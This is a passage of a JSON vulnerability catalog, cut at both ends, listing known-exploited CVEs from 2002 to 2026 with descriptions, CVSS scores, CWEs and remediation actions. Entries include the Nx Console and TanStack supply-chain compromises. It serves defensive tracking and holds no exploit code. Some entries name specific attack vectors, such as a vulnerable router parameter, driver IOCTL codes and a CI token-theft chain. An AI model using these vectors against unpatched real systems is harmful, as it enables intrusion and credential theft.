how they operate."}], "cves": [{"cve_id": "CVE-2026-48027", "name": "Nx Console Embedded Malicious Code Vulnerability", "vendor": "Nx", "product": "Nx Console", "kev_description": "Nx Console contains an embedded malicious code vulnerability that allowed a malicious version of Nx Console to be published. The compromised extension fetched an obfuscated payload that could harvested credentials from multiple sources on disk and in memory.", "nvd_description": "Nx Console is the user interface for Nx & Lerna. On 19 May 2026, a malicious version of Nx Console, 18.95.0, was published at 12:30 PM UTC and removed soon after at 12:48 PM UTC, leaving it available for ~18 minutes in Visual Studio Marketplace. For OpenVSX, the problem was detected later, and the compromised version was available from 12:33 UTC to 13:09 UTC (~36 minutes). Version 18.100.0 of Nx Console is not compromised and users may remediate by upgrading to that version.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-506"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2025-52691", "name": "SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability", "vendor": "SmarterTools", "product": "SmarterMail", "kev_description": "SmarterTools SmarterMail contains an unrestricted upload of file with dangerous type vulnerability that could allow an unauthenticated attacker to upload arbitrary files to any location on the mail server, potentially enabling remote code execution.", "nvd_description": "Successful exploitation of the vulnerability could allow an unauthenticated attacker to upload arbitrary files to any location on the mail server, potentially enabling remote code execution.", "cvss": "10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "cwes": ["CWE-434"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2024-1708", "name": "ConnectWise ScreenConnect Path Traversal Vulnerability", "vendor": "ConnectWise", "product": "ScreenConnect", "kev_description": "ConnectWise ScreenConnect contains a path traversal vulnerability which could allow an attacker to execute remote code or directly impact confidential data and critical systems.", "nvd_description": "ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker \n\nthe ability to execute remote code or directly impact confidential data or critical systems.\n\n", "cvss": "8.4 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "cwes": ["CWE-22"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2023-27351", "name": "PaperCut NG/MF Improper Authentication Vulnerability", "vendor": "PaperCut", "product": "NG/MF", "kev_description": "PaperCut NG/MF contains an improper authentication vulnerability that could allow remote attackers to bypass authentication on affected installations via the SecurityRequestFilter class.", "nvd_description": "This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SecurityRequestFilter class. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19226.", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-287"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2022-31199", "name": "Netwrix Auditor Insecure Object Deserialization Vulnerability", "vendor": "Netwrix", "product": "Auditor", "kev_description": "Netwrix Auditor User Activity Video Recording component contains an insecure objection deserialization vulnerability that allows an unauthenticated, remote attacker to execute code as the NT AUTHORITY\\SYSTEM user. Successful exploitation requires that the attacker is able to reach port 9004/TCP, which is commonly blocked by standard enterprise firewalling.", "nvd_description": "Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server and agents installed on monitored systems. The remote code execution vulnerabilities exist within the underlying protocol used by the component, and potentially allow an unauthenticated remote attacker to execute arbitrary code as the NT AUTHORITY\\SYSTEM user on affected systems, including on systems Netwrix Auditor monitors.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-502"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions or discontinue use of the product if updates are unavailable."}, {"cve_id": "CVE-2021-44529", "name": "Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) Code Injection Vulnerability ", "vendor": "Ivanti", "product": "Endpoint Manager Cloud Service Appliance (EPM CSA)", "kev_description": "Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) contains a code injection vulnerability that allows an unauthenticated user to execute malicious code with limited permissions (nobody).", "nvd_description": "A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-94"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2020-3259", "name": "Cisco ASA and FTD Information Disclosure Vulnerability", "vendor": "Cisco", "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)", "kev_description": "Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.", "nvd_description": "A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. An attacker could exploit this vulnerability by sending a crafted GET request to the web services interface. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information. Note: This vulnerability affects only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-200"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2019-6693", "name": "Fortinet FortiOS Use of Hard-Coded Credentials Vulnerability", "vendor": "Fortinet", "product": "FortiOS", "kev_description": "Fortinet FortiOS contains a use of hard-coded credentials vulnerability that could allow an attacker to cipher sensitive data in FortiOS configuration backup file via knowledge of the hard-coded key. ", "nvd_description": "Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users' passwords (except the administrator's password), private keys' passphrases and High Availability password (when set).", "cvss": "6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-798"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2018-8639", "name": "Microsoft Windows Win32k Improper Resource Shutdown or Release Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows Win32k contains an improper resource shutdown or release vulnerability that allows for local, authenticated privilege escalation. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.", "nvd_description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability.\" This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8641.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-404"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2017-1000253", "name": "Linux Kernel PIE Stack Buffer Corruption Vulnerability ", "vendor": "Linux", "product": "Kernel", "kev_description": "Linux kernel contains a position-independent executable (PIE) stack buffer corruption vulnerability in load_elf_ binary() that allows a local attacker to escalate privileges. ", "nvd_description": "Linux distributions that have not patched their long-term kernels with https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (committed on April 14, 2015). This kernel vulnerability was fixed in April 2015 by commit a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in May 2015), but it was not recognized as a security threat. With CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down address allocation strategy, load_elf_binary() will attempt to map a PIE binary into an address range immediately below mm->mmap_base. Unfortunately, load_elf_ binary() does not take account of the need to allocate sufficient space for the entire binary which means that, while the first PT_LOAD segment is mapped below mm->mmap_base, the subsequent PT_LOAD segment(s) end up being mapped above mm->mmap_base into the are that is supposed to be the \"gap\" between the stack and the binary.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-119"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2016-0034", "name": "Microsoft Silverlight Runtime Remote Code Execution Vulnerability", "vendor": "Microsoft", "product": "Silverlight", "kev_description": "Microsoft Silverlight mishandles negative offsets during decoding, which allows attackers to execute remote code or cause a denial-of-service (DoS).", "nvd_description": "Microsoft Silverlight 5 before 5.1.41212.0 mishandles negative offsets during decoding, which allows remote attackers to execute arbitrary code or cause a denial of service (object-header corruption) via a crafted web site, aka \"Silverlight Runtime Remote Code Execution Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "The impacted products are end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2015-2291", "name": "Intel Ethernet Diagnostics Driver for Windows Denial-of-Service Vulnerability", "vendor": "Intel", "product": "Ethernet Diagnostics Driver for Windows", "kev_description": "Intel ethernet diagnostics driver for Windows IQVW32.sys and IQVW64.sys contain an unspecified vulnerability that allows for a denial-of-service (DoS).", "nvd_description": "(1) IQVW32.sys before 1.3.1.0 and (2) IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allows local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-20"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2014-1812", "name": "Microsoft Windows Group Policy Preferences Password Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows Active Directory contains a privilege escalation vulnerability due to the way it distributes passwords that are configured using Group Policy preferences. An authenticated attacker who successfully exploits the vulnerability could decrypt the passwords and use them to elevate privileges on the domain.", "nvd_description": "The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka \"Group Policy Preferences Password Elevation of Privilege Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-255", "CWE-522"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2013-3993", "name": "IBM InfoSphere BigInsights Invalid Input Vulnerability", "vendor": "IBM", "product": "InfoSphere BigInsights", "kev_description": "Certain APIs within BigInsights can take invalid input that might allow attackers unauthorized access to read, write, modify, or delete data.", "nvd_description": "IBM InfoSphere BigInsights before 2.1.0.3 allows remote authenticated users to bypass intended file and directory restrictions, or access untrusted data or code, via crafted parameters in unspecified API calls.", "cvss": "6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-22"], "ransomware_use": "Known", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2012-1710", "name": "Oracle Fusion Middleware Unspecified Vulnerability", "vendor": "Oracle", "product": "Fusion Middleware", "kev_description": "Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware allows remote attackers to affect confidentiality, integrity, and availability via Unknown vectors related to Designer.", "nvd_description": "Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Designer, a different vulnerability than CVE-2012-1709.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2011-3402", "name": "Microsoft Windows Remote Code Execution Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows Kernel contains an unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers that allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page.", "nvd_description": "Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka \"TrueType Font Parsing Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2010-1428", "name": "Red Hat JBoss Information Disclosure Vulnerability", "vendor": "Red Hat", "product": "JBoss", "kev_description": "Unauthenticated access to the JBoss Application Server Web Console (/web-console) is blocked by default. However, it was found that this block was incomplete, and only blocked GET and POST HTTP verbs. A remote attacker could use this flaw to gain access to sensitive information.", "nvd_description": "The Web Console (aka web-console) in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to obtain sensitive information via an unspecified request that uses a different method.", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-749"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2009-3960", "name": "Adobe BlazeDS Information Disclosure Vulnerability", "vendor": "Adobe", "product": "BlazeDS", "kev_description": "Adobe BlazeDS, which is utilized in LifeCycle and Coldfusion, contains a vulnerability that allows for information disclosure.", "nvd_description": "Unspecified vulnerability in BlazeDS 3.2 and earlier, as used in LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0, allows remote attackers to obtain sensitive information via vectors that are associated with a request, and related to injected tags and external entity references in XML documents.", "cvss": "6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2008-2992", "name": "Adobe Reader and Acrobat Input Validation Vulnerability", "vendor": "Adobe", "product": "Acrobat and Reader", "kev_description": "Adobe Acrobat and Reader contain an input validation issue in a JavaScript method that could potentially lead to remote code execution.", "nvd_description": "Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-787"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2007-0671", "name": "Microsoft Office Excel Remote Code Execution Vulnerability", "vendor": "Microsoft", "product": "Office", "kev_description": "Microsoft Office Excel contains a remote code execution vulnerability that can be exploited when a specially crafted Excel file is opened. This malicious file could be delivered as an email attachment or hosted on a malicious website. An attacker could leverage this vulnerability by creating a specially crafted Excel file, which, when opened, allowing an attacker to execute remote code on the affected system.", "nvd_description": "Unspecified vulnerability in Microsoft Excel 2000, XP, 2003, and 2004 for Mac, and possibly other Office products, allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as demonstrated by Exploit-MSExcel.h in targeted zero-day attacks.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2006-2492", "name": "Microsoft Word Malformed Object Pointer Vulnerability", "vendor": "Microsoft", "product": "Word", "kev_description": "Microsoft Word and Microsoft Works Suites contain a malformed object pointer which allows attackers to execute code.", "nvd_description": "Buffer overflow in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 Sp1 and SP2, and Microsoft Works Suites through 2006, allows user-assisted attackers to execute arbitrary code via a malformed object pointer, as originally reported by ISC on 20060519 for a zero-day attack.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-120"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2005-2773", "name": "HP OpenView Network Node Manager Remote Code Execution Vulnerability", "vendor": "Hewlett Packard (HP)", "product": "OpenView Network Node Manager", "kev_description": "HP OpenView Network Node Manager could allow a remote attacker to execute arbitrary commands on the system.", "nvd_description": "HP OpenView Network Node Manager 6.2 through 7.50 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) node parameter to connectedNodes.ovpl, (2) cdpView.ovpl, (3) freeIPaddrs.ovpl, and (4) ecscmg.ovpl.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-77"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2004-1464", "name": "Cisco IOS Denial-of-Service Vulnerability", "vendor": "Cisco", "product": "IOS", "kev_description": "Cisco IOS contains an unspecified vulnerability that may block further telnet, reverse telnet, Remote Shell (RSH), Secure Shell (SSH), and in some cases, Hypertext Transport Protocol (HTTP) access to the Cisco device.", "nvd_description": "Cisco IOS 12.2(15) and earlier allows remote attackers to cause a denial of service (refused VTY (virtual terminal) connections), via a crafted TCP connection to the Telnet or reverse Telnet port.", "cvss": "5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "cwes": ["CWE-400"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2002-0367", "name": "Microsoft Windows Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "smss.exe debugging subsystem in Microsoft Windows does not properly authenticate programs that connect to other programs, which allows local users to gain administrator or SYSTEM privileges.", "nvd_description": "smss.exe debugging subsystem in Windows NT and Windows 2000 does not properly authenticate programs that connect to other programs, which allows local users to gain administrator or SYSTEM privileges by duplicating a handle to a privileged process, as demonstrated by DebPloit.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-269"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2026-45321", "name": "TanStack Unspecified Vulnerability", "vendor": "TanStack", "product": "TanStack", "kev_description": "TanStack contains an unspecified vulnerability that allowed malicious versions of the product to be published to the npm registry to publish credential-stealing malware under a trusted identity.", "nvd_description": "On 2026-05-11, between approximately 19:20 and 19:26 UTC, 84 malicious versions across 42 @tanstack/* packages were published to the npm registry. The publishes were authenticated via the legitimate GitHub Actions OIDC trusted-publisher binding for TanStack/router, but the publish workflow itself was not modified. The attacker chained three known vulnerability classes — a pull_request_target \"Pwn Request\" misconfiguration, GitHub Actions cache poisoning across the fork↔base trust boundary, and runtime memory extraction of the OIDC token from the Actions runner process — to publish credential-stealing malware under a trusted identity. Each affected package received exactly two malicious versions, published a few minutes apart.", "cvss": "9.6 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "cwes": ["CWE-506"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2025-55182", "name": "Meta React Server Components Remote Code Execution Vulnerability", "vendor": "Meta", "product": "React Server Components", "kev_description": "Meta React Server Components contains a remote code execution vulnerability that could allow unauthenticated remote code execution by exploiting a flaw in how React decodes payloads sent to React Server Function endpoints. Please note CVE-2025-66478 has been rejected, but it is associated with CVE-2025- 55182.", "nvd_description": "A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.", "cvss": "10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "cwes": ["CWE-502"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2024-57728", "name": "SimpleHelp Path Traversal Vulnerability", "vendor": "SimpleHelp ", "product": "SimpleHelp", "kev_description": "SimpleHelp contains a path traversal vulnerability that allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip). This can be exploited to execute arbitrary code on the host in the context of the SimpleHelp server user.", "nvd_description": "SimpleHelp remote support software v5.5.7 and before allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip). This can be exploited to execute arbitrary code on the host in the context of the SimpleHelp server user.", "cvss": "7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-22", "CWE-59"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2023-21529", "name": "Microsoft Exchange Server Deserialization of Untrusted Data Vulnerability", "vendor": "Microsoft", "product": "Exchange Server", "kev_description": "Microsoft Exchange Server contains a deserialization of untrusted data that allows an authenticated attacker to achieve remote code execution.", "nvd_description": "Microsoft Exchange Server Remote Code Execution Vulnerability", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-502"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2022-36537", "name": "ZK Framework AuUploader Unspecified Vulnerability", "vendor": "ZK Framework", "product": "AuUploader", "kev_description": "ZK Framework AuUploader servlets contain an unspecified vulnerability that could allow an attacker to retrieve the content of a file located in the web context. The ZK Framework is an open-source Java framework. This vulnerability can impact multiple products, including but not limited to ConnectWise R1Soft Server Backup Manager.", "nvd_description": "ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2021-3129", "name": "Laravel Ignition File Upload Vulnerability", "vendor": "Laravel", "product": "Ignition", "kev_description": "Laravel Ignition contains a file upload vulnerability that allows unauthenticated remote attackers to execute malicious code due to insecure usage of file_get_contents() and file_put_contents().", "nvd_description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2020-3433", "name": "Cisco AnyConnect Secure Mobility Client for Windows DLL Hijacking Vulnerability", "vendor": "Cisco", "product": "AnyConnect Secure", "kev_description": "Cisco AnyConnect Secure Mobility Client for Windows interprocess communication (IPC) channel allows for insufficient validation of resources that are loaded by the application at run time. An attacker with valid credentials on Windows could execute code on the affected machine with SYSTEM privileges.", "nvd_description": "A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-427"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2019-1388", "name": "Microsoft Windows Certificate Dialog Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows Certificate Dialog contains a privilege escalation vulnerability, allowing attackers to run processes in an elevated context.", "nvd_description": "An elevation of privilege vulnerability exists in the Windows Certificate Dialog when it does not properly enforce user privileges, aka 'Windows Certificate Dialog Elevation of Privilege Vulnerability'.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-269"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2018-19323", "name": "GIGABYTE Multiple Products Privilege Escalation Vulnerability", "vendor": "GIGABYTE", "product": "Multiple Products", "kev_description": "The GPCIDrv and GDrv low-level drivers in GIGABYTE App Center, AORUS Graphics Engine, XTREME Gaming Engine, and OC GURU expose functionality to read and write arbitrary physical memory. This could be leveraged by a local attacker to elevate privileges.", "nvd_description": "The GDrv low-level driver in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 exposes functionality to read and write Machine Specific Registers (MSRs).", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2017-6884", "name": "Zyxel EMG2926 Routers Command Injection Vulnerability", "vendor": "Zyxel", "product": "EMG2926 Routers", "kev_description": "Zyxel EMG2926 routers contain a command injection vulnerability located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors to execute malicious commands on the router, such as the ping_ip parameter to the expert/maintenance/diagnostic/nslookup URI.", "nvd_description": "A command injection vulnerability was discovered on the Zyxel EMG2926 home router with firmware V1.00(AAQT.4)b8. The vulnerability is located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router, such as the ping_ip parameter to the expert/maintenance/diagnostic/nslookup URI.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-78"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2016-3351", "name": "Microsoft Internet Explorer and Edge Information Disclosure Vulnerability", "vendor": "Microsoft", "product": "Internet Explorer and Edge", "kev_description": "An information disclosure vulnerability exists in the way that certain functions in Internet Explorer and Edge handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer.", "nvd_description": "Microsoft Internet Explorer 9 through 11 and Microsoft Edge allow remote attackers to obtain sensitive information via a crafted web site, aka \"Microsoft Browser Information Disclosure Vulnerability.\"", "cvss": "6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2015-2546", "name": "Microsoft Win32k Memory Corruption Vulnerability", "vendor": "Microsoft", "product": "Win32k", "kev_description": "The 